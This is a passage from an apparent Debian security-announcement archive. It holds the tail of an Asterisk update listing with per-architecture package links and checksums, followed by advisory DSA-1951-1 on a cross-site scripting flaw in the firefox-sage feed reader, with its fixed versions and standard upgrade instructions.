http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_alpha.deb
Size/MD5 checksum: 2761948 017041bb2c755b0e404351134d40808a

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_amd64.deb
Size/MD5 checksum: 397512 6f2936b9f76618b89c7994d094c372cf
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_amd64.deb
Size/MD5 checksum: 13086704 ed835ac48b8b0fd614ebc960007b508b
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_amd64.deb
Size/MD5 checksum: 2605278 dc7e3fe7307e402d8d59504c89434a84

arm architecture (ARM)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_arm.deb
Size/MD5 checksum: 12770542 6b450a1fcae626174db68a0ec9c831be
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_arm.deb
Size/MD5 checksum: 401766 fee883c4784ad9075da742d83f4baaa3
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_arm.deb
Size/MD5 checksum: 2510430 cd143e5ccf034d4eba145b2deabe87bd

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_armel.deb
Size/MD5 checksum: 394588 d3e10caf1c6d790306701d9f34ac4fa4
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_armel.deb
Size/MD5 checksum: 2540364 bb48863ea50a58f2358768c431fa1ca0
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_armel.deb
Size/MD5 checksum: 12840170 d02ebc2ddb92f53bcbd089bc4d41bd10

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_hppa.deb
Size/MD5 checksum: 12871212 af107f8cc96f9b0b7030ec28a1967f13
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_hppa.deb
Size/MD5 checksum: 2780732 8534dd0bd7e9a46264357beeb692df19
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_hppa.deb
Size/MD5 checksum: 412474 ac2070408bb67f325bd6ad7d3cbf032d

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_i386.deb
Size/MD5 checksum: 2407006 2bbd456e2d36a734ac0789b6ff7e9d22
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_i386.deb
Size/MD5 checksum: 12937820 46acd420961efc6c932d94eec0452ad3
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_i386.deb
Size/MD5 checksum: 388450 7c9e49cb8610a577d63f3fb77ecd92da

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_ia64.deb
Size/MD5 checksum: 13034554 8ca056f64fd91cc8597716834c894ce9
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_ia64.deb
Size/MD5 checksum: 426588 9adc9d1948c77775cea4f248c7f261ae
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_ia64.deb
Size/MD5 checksum: 3469020 6fcb11fa7b42f4cdce76c5c59a44b45c

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_mips.deb
Size/MD5 checksum: 381612 8373d46bc9e95e7f15821174f7432652
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_mips.deb
Size/MD5 checksum: 13433728 245c4ec2754177b5082d809733dc6e28
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_mips.deb
Size/MD5 checksum: 2464570 6095542e8813aa8b64d025fe6c23697d

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_powerpc.deb
Size/MD5 checksum: 2806054 30cba312761b5b442ec3fbecf457e2c2
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_powerpc.deb
Size/MD5 checksum: 391488 ccb3c29a722a0a375aac06bd5937902c
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_powerpc.deb
Size/MD5 checksum: 13267248 e867f0f519ddf844b366739c62a88869

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_sparc.deb
Size/MD5 checksum: 2490436 434bf630723e57b97273291e780953c3
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_sparc.deb
Size/MD5 checksum: 12742386 004d7b7016529815d21e2a086c20c718
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_sparc.deb
Size/MD5 checksum: 389034 601d2368a23b3ee43385b8c28928ba24

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksniOkACgkQ62zWxYk/rQf4YgCePUowSZn5DwLJ98DvEL7T1mvC
hZYAnicdU3gpH6ErJT0EG2JRC33uaHEv
=qf6k
-----END PGP SIGNATURE-----

[SECURITY] [DSA 1951-1] New firefox-sage packages fix insufficient input sanitizing

2009-12-15T03:55:16Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1951-1 security@...
http://www.debian.org/security/ Steffen Joeris
December 15, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : firefox-sage
Vulnerability : insufficient input sanitising
Problem type : remote
Debian-specific: no
CVE Id : CVE-2009-4102
Debian Bug : 559267

It was discovered that firefox-sage, a lightweight RSS and Atom feed
reader for Firefox, does not sanitise the RSS feed information
correctly, which makes it prone to a cross-site scripting and a
cross-domain scripting attack.

For the stable distribution (lenny), this problem has been fixed in
version 1.4.2-0.1+lenny1.

For the oldstable distribution (etch), this problem has been fixed in
version 1.3.6-4etch1.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 1.4.3-3.

We recommend that you upgrade your firefox-sage packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.dsc
Size/MD5 checksum: 607 d4175001caa8fc685f47452de46aaa03
http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6.orig.tar.gz
Size/MD5 checksum: 135325 49c68a517b6611c7352feb6072be9567
http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.diff.gz
Size/MD5 checksum: 13123 a59b6403405d4c6214b569fdb068049f

Architecture independent packages:

http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1_all.deb
Size/MD5 checksum: 150172 57339ba6521e7611e4e27fce4f87df31

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.diff.gz
Size/MD5 checksum: 15552 c62acce299739cfe09c5ed671f0d310f
http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2.orig.tar.gz
Size/MD5 checksum: 169202 71f4d7379bc6e39640fc20016493f129
http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.dsc
Size/MD5 checksum: 1039 f47c953cd90197453e1ce165f13cb701

Architecture independent packages:

http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1_all.deb
Size/MD5 checksum: 171308 63a27b648f10e021b18acf9c8d8d24f0

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksneJ0ACgkQ62zWxYk/rQeRnACgl5xAjdWg9H6/gvteFqVkY1bh
w/kAnRzc6lGDWUAoe6H3pjfZdP1XhMDx
=CsHJ
-----END PGP SIGNATURE-----